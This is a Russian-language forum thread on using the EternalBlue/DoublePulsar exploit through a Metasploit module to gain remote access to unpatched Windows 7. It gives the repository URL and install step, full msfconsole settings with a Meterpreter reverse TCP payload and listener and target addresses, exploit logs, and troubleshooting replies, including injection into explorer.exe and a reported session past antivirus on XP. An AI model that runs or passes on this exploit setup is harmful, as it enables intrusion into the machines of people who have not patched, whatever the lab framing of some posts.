• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Eternalblue & Doublepulsar Exploit in Metasploit Win 7 Hack

Всем хорошего.

Наверное все уже начитались про слитые с ресурсов АНБ кучу разных утилит, уязвимостей и т.д. Eternalblue & Doublepulsar Exploit одна из них, и как не странно, все еще актуальность имеет. Хотя почему странно, если у нас люди сидят по 3-4 года на Win 7 не обновлясь ( у некоторых причина - потеря хакнутой лицензии, тачка не тянет, и так все работает ). так вот, данный экслоит нацелен на remote эксплоутацию.

берем тут git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

файл eternalblue_doublepulsar.rb копируем сюда /usr/share/metasploit-framework/modules/exploits/windows/smb

собственно все на скринах

17164633.png

17164647.png

17164652.png


Если все пройдет успешно - получим доступ к тачке.

17164720.png


В моем случае это был Win7 Ентерпрайз
[doublepost=1494355854,1494355356][/doublepost]то что IP разные на скринах - перазапускал виртуалку и другой комп заюзал для атаки
[doublepost=1494358832][/doublepost]Видео по теме (не мое)

 
E

exe111

Добрый день. Что я делаю не так?
[HIDE="2"]use exploit/windows/smb/eternalblue_doublepulsar.rb
set TARGETARCHITECTURE x86
set DOUBLEPULSARPATH C:/deps
set ETERNALBLUEPATH C:/deps
set winepath /deps/
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x64
set lhost 192.168.56.1
set rhost 192.168.56.101
run
Безымянный.png



 
  • Нравится
Реакции: Botov

id2746

Green Team
12.11.2016
435
644
BIT
14
Какую систему тестируете? Что стоит в таргете?
Сканером прогоняли на наличие уязвимости?
 
Последнее редактирование:
E

exe111

Какую систему тестируете? Что стоит в таргете?
Сканером прогоняли на наличие уязвимости?
Wind 7 x64
Обычным ms17_010_eternalblue.rb её норм берет.
Проблема с этим экспоитом eternalblue_doublepulsar. Точнее с xml конфигурацией.
Сначало вообще не могло найти файлы Eternalblue-2.2.0.exe и Doublepulsar-1.3.1.exe, хотя путь к директории был указан верно - в коде экспоита поменял 2 строки с путями к файлам Eternalblue и doublepulsar
( output = `cd #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.exe` (было output = `cd #{datastore['ETERNALBLUEPATH']} wine Eternalblue-2.2.0.exe`))

Экспоит применяю с Windows,а не с Ubuntu. Может еще где что-нибудь поменять нужно? Вот пример файла конфигурации, с которым Doublepulsar выдает это:
 

Вложения

  • Doublepulsar-1.3.1.rar
    1,3 КБ · Просмотры: 192

Dr.Lafa

Green Team
30.12.2016
507
1 049
BIT
0
Wind 7 x64
Обычным ms17_010_eternalblue.rb её норм берет.
Проблема с этим экспоитом eternalblue_doublepulsar. Точнее с xml конфигурацией.
Сначало вообще не могло найти файлы Eternalblue-2.2.0.exe и Doublepulsar-1.3.1.exe, хотя путь к директории был указан верно - в коде экспоита поменял 2 строки с путями к файлам Eternalblue и doublepulsar
( output = `cd #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.exe` (было output = `cd #{datastore['ETERNALBLUEPATH']} wine Eternalblue-2.2.0.exe`))

Экспоит применяю с Windows,а не с Ubuntu. Может еще где что-нибудь поменять нужно? Вот пример файла конфигурации, с которым Doublepulsar выдает это:
Кулхацкеры должны сидеть из под Kali и знать English как свои five fistings. По винде ты мало инфы найдёшь.
 
1

1Sys-Admin1

Код:
[-] Handler failed to bind to 185.34.20.132:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 192.168.88.249:445 - Generating Eternalblue XML data
cp: не удалось выполнить stat для '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: Нет такого файла или каталога
[*] 192.168.88.249:445 - Generating Doublepulsar XML data
cp: не удалось выполнить stat для '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: Нет такого файла или каталога
[*] 192.168.88.249:445 - Generating payload DLL for Doublepulsar
[*] 192.168.88.249:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.88.249:445 - Launching Eternalblue...
sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"
[-] 192.168.88.249:445 - Are you sure it's vulnerable?
[*] 192.168.88.249:445 - Launching Doublepulsar...
sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
wine: cannot find L"C:\\windows\\system32\\Doublepulsar-1.3.1.exe"
[-] 192.168.88.249:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >
[doublepost=1495992205,1495992170][/doublepost]автор напиши в вк vk.com/sys787
[doublepost=1495992627][/doublepost]все скопировал и сделал как написанно
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
2.2.0.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: Нет такого файла или каталога

[doublepost=1495992627][/doublepost]все скопировал и сделал как написанно


Надо НЕ КОПИРОВАТЬ, а брать за основу! По всей видимости на рабочем столе (Desktop) у Вас ничего нет ( данной папки )
 

jsat

Green Team
20.04.2017
30
8
BIT
1
Спасибо ghostphisher, с Windows XP SP3 x86 AV Касперский сессия получен...
[doublepost=1496490385,1496489951][/doublepost]
Добрый день. Что я делаю не так?
***Скрытый текст***
Перед тем необходимо сканировать на уязвимость SMB MS017-010
Пробуйте вот так, папка при клонировании по умолчанию создается в /root/
>set ETERNALBLUEPATH /root/Etenalblue-Doublepulsar-Metasploit/deps
>set DOUBLEPULSARPATH /root/Etenalblue-Doublepulsar-Metasploit/deps
Я инжектировал в explorer.exe
 
Последнее редактирование:
  • Нравится
Реакции: ghostphisher

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
Кто в курсе: в билютене безопасности было описано,что все ситемы вплоть до Win 10 без патча подвержены этой уязвимости. smb сканер из комплекта показывает,что есть уязвимые десятки в сети,но при эксплуатации сессию не даёт
 

id2746

Green Team
12.11.2016
435
644
BIT
14
Кто в курсе: в билютене безопасности было описано,что все ситемы вплоть до Win 10 без патча подвержены этой уязвимости. smb сканер из комплекта показывает,что есть уязвимые десятки в сети,но при эксплуатации сессию не даёт
А что используете
Снимок экрана от 2017-06-14 14-59-09.png

?

Какие настройки TARGETS?
Какая архитектура цели и соответствует ли выбранной архитектуре?

Сбросьте скрины сканирования auxiliary и options эксплоита с пейлоудом
 
D

Dmitry88

smb сканер из комплекта показывает,что есть уязвимые десятки в сети,но при эксплуатации сессию не даёт
То есть эксплуатация проходит успешно, но в listeners пусто? Или клиенты есть, но они не получают команды по взаимодействию? В любом случае нужно проверить антивирус\фаерволы.
ПС : лично я на win 10 не тестировал.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!